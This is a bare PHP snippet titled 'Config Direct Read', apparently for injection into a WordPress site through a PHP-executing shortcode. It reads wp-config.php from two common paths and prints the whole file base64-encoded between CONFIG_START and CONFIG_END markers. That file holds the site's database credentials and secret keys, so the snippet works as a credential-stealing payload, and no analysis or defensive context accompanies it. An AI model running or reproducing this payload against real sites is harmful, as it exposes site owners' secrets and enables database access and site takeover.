Config Direct Read
[php]
$c = file_get_contents(“/var/www/html/wp-config.php”);
if ($c === false) {
$c = file_get_contents(“/var/www/wp-config.php”);
}
if ($c === false) {
$c = “COULD_NOT_READ_CONFIG”;
}
echo “CONFIG_START:” . base64_encode($c) . “:CONFIG_END”;
[/php]